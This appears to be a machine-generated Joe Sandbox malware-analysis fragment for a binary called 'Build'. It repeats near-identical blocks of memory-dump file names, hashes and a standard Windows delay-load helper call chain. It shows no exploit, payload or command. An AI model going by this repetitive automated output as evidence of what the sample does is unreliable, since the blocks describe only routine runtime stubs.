                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: e26f980d7477805d35ec6c9904d7b78853bf8818ca011620c92fd432201e5db1
                                                                                          • Instruction ID: ee27d760fcbde31f42e824cf38204338053d2486f3243950071d0d93b039c47e
                                                                                          • Opcode Fuzzy Hash: e26f980d7477805d35ec6c9904d7b78853bf8818ca011620c92fd432201e5db1
                                                                                          • Instruction Fuzzy Hash: 49B0128936C302AC328F71589C02D7F011CD0C0B10331857FF408C4040F4405C4C0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 7d77f057fdf8906a7554b93524c1292d5b03d2e3ffcfdc4bd7174e0f87584893
                                                                                          • Instruction ID: 54c4f84ceb7ac7b7680da0e072009a26b6d65acb3962f3ac84cd911bd90479c6
                                                                                          • Opcode Fuzzy Hash: 7d77f057fdf8906a7554b93524c1292d5b03d2e3ffcfdc4bd7174e0f87584893
                                                                                          • Instruction Fuzzy Hash: C4B0128935C602AC328F71599D02D7F011CC0C0B1033186BEF818C4040F4405C4D0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 4db3075e8ad26f004aa1e0dd93ca2100b60f86c11d955fbaa8e6c99fd90548d8
                                                                                          • Instruction ID: dda49c34d7343e9c8b48065f4d16a8ffe1832d66068863c1ae95ef8dfc031893
                                                                                          • Opcode Fuzzy Hash: 4db3075e8ad26f004aa1e0dd93ca2100b60f86c11d955fbaa8e6c99fd90548d8
                                                                                          • Instruction Fuzzy Hash: 10B0129A35C202AC328F71585C02D3F010CC0C0B10331C47EF808C4040F4405C4C0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: fdfeb3208041168942946bb39c179ec0121c235e590a3ea9a100e08bf3ee1413
                                                                                          • Instruction ID: d114d3a976ef67a900966342b95b55e171d22037c62aa8eccbd7631df27a3aef
                                                                                          • Opcode Fuzzy Hash: fdfeb3208041168942946bb39c179ec0121c235e590a3ea9a100e08bf3ee1413
                                                                                          • Instruction Fuzzy Hash: C9B0128935C202AC32CF71A85C02D3F010CD0C0B10331C87EF409C4240F4405C4C0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: af89573d62ba65b07e3871af5a27d59bcbcb35c07c45aaaa309f42c8386c59b4
                                                                                          • Instruction ID: b5b137e106d869d4afaacc980aeae52f9d0e6526594ad0875197c48672a6ce9b
                                                                                          • Opcode Fuzzy Hash: af89573d62ba65b07e3871af5a27d59bcbcb35c07c45aaaa309f42c8386c59b4
                                                                                          • Instruction Fuzzy Hash: 14B0128935C202AC32CF71595D02D3F010CC0C0B10331C4BEF818C4240F4405C4D1731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 1cfa1804c5b8c5ad70a5d838a7243a28bc76b048074139b1c32e559039aaa807
                                                                                          • Instruction ID: 4b0b332a1398379cc16df8e1a66f15daea14b0eb27da84bd5040dadb06406932
                                                                                          • Opcode Fuzzy Hash: 1cfa1804c5b8c5ad70a5d838a7243a28bc76b048074139b1c32e559039aaa807
                                                                                          • Instruction Fuzzy Hash: 26B09289258242AC32CF71595C02D3A010CC0C0B10321856AF408C4240A4405C8C0631
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: e0c6f0fe59ad4b94ccb789f32dde9ce33200c0634888945a8eb2036eb31db54e
                                                                                          • Instruction ID: be6ecb7ae01d680816fea358286a2322069256a0a1226e2f5a620e43bcf22b4c
                                                                                          • Opcode Fuzzy Hash: e0c6f0fe59ad4b94ccb789f32dde9ce33200c0634888945a8eb2036eb31db54e
                                                                                          • Instruction Fuzzy Hash: D2B09289258202AC328F75585C02D3A010CC0C0B10321C46AF808C4240A4405C4C0631
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 4406c5edb53ae92badbc4392f99a35aa66acbb6f8a10031bf09cb38ec8a0592a
                                                                                          • Instruction ID: 71ee8726e5bd85f2c86f0fb43bce171635530c1218d4078f9100c6fafdafd2e9
                                                                                          • Opcode Fuzzy Hash: 4406c5edb53ae92badbc4392f99a35aa66acbb6f8a10031bf09cb38ec8a0592a
                                                                                          • Instruction Fuzzy Hash: CDB012CD35C302AC329F71585C42D3F010CD0C0B10331847EF408C4140F4405C4C0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: a9fb53d1decf07cf283d8247967ebe9db2d54375a00a8402e65e29ab4d864648
                                                                                          • Instruction ID: bf8c1b5fde4b1c6cc671446446bb202b85c1c9ae4b1a8d68a49eac12b8d5f056
                                                                                          • Opcode Fuzzy Hash: a9fb53d1decf07cf283d8247967ebe9db2d54375a00a8402e65e29ab4d864648
                                                                                          • Instruction Fuzzy Hash: AAB0129935D302AC33CF72595C02D3F010CC0C0B10331857EF408C4040F4409C8C0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 4bbf29bb04f7769081403ae271bc75fcde6952c47a9a379394ab95fd17ec50a8
                                                                                          • Instruction ID: 6aff04bf2db621fd79f669ebe4983546bbffc86650438f2a49de615868a3bbfb
                                                                                          • Opcode Fuzzy Hash: 4bbf29bb04f7769081403ae271bc75fcde6952c47a9a379394ab95fd17ec50a8
                                                                                          • Instruction Fuzzy Hash: 1AB0129935C202AC328F71595C02D3F010CD0C0B1033184BEF408C4040F4405C4C0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 0b03db89fee3677748c7a618ff3ca40075446c80788783758376d2fa72c4c80a
                                                                                          • Instruction ID: 877e7e71267eeafe0e30dfecc7eedff36f2116e800e06ae1c5c4dfa77962c03b
                                                                                          • Opcode Fuzzy Hash: 0b03db89fee3677748c7a618ff3ca40075446c80788783758376d2fa72c4c80a
                                                                                          • Instruction Fuzzy Hash: 2AB0129935C202AC328F71595D02D3F010CC0C0B1033184BEF818C4040F4405D4D0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038068E
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: ddba6eabfd24f3e8678ae1daa355292be1c3902d99d4d8619bcf1f5102d37e92
                                                                                          • Instruction ID: 64affbc039d47b98512a5a5d86d5a2dac1fcf56811417a3220de8f2076a9ed2b
                                                                                          • Opcode Fuzzy Hash: ddba6eabfd24f3e8678ae1daa355292be1c3902d99d4d8619bcf1f5102d37e92
                                                                                          • Instruction Fuzzy Hash: CAB012D935C202AC328F71595D02D3F018CC0C0B1033184BEF818C4040F4406C4D0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003808A7
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 63a6d9afba599df9935d401068fc144964ec2128b12f2d1d88e71d856c0da3ad
                                                                                          • Instruction ID: 7f0d3078a754b516ee7a424079cb51305ce98912e029fea43dbfd1744f4d5b68
                                                                                          • Opcode Fuzzy Hash: 63a6d9afba599df9935d401068fc144964ec2128b12f2d1d88e71d856c0da3ad
                                                                                          • Instruction Fuzzy Hash: C1B0128637C211AC328F71589C02E7A120CD0C0B11330866FF408C4041E4401C8C0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003808A7
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 832b8e70390556bd4f1fc35bb8fd25f19489a3c498c7ddd5adb4970e942fc93c
                                                                                          • Instruction ID: 99bd36d22acb25cd2cb218f663211f20e0fff0f630a8458a93c23c63470b5db7
                                                                                          • Opcode Fuzzy Hash: 832b8e70390556bd4f1fc35bb8fd25f19489a3c498c7ddd5adb4970e942fc93c
                                                                                          • Instruction Fuzzy Hash: B7B012C63AC311AC329F71585C02E3A120CD0C0B11330846EF808C4141E4401C8C0731
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003808A7
                                                                                            • Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
                                                                                            • Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
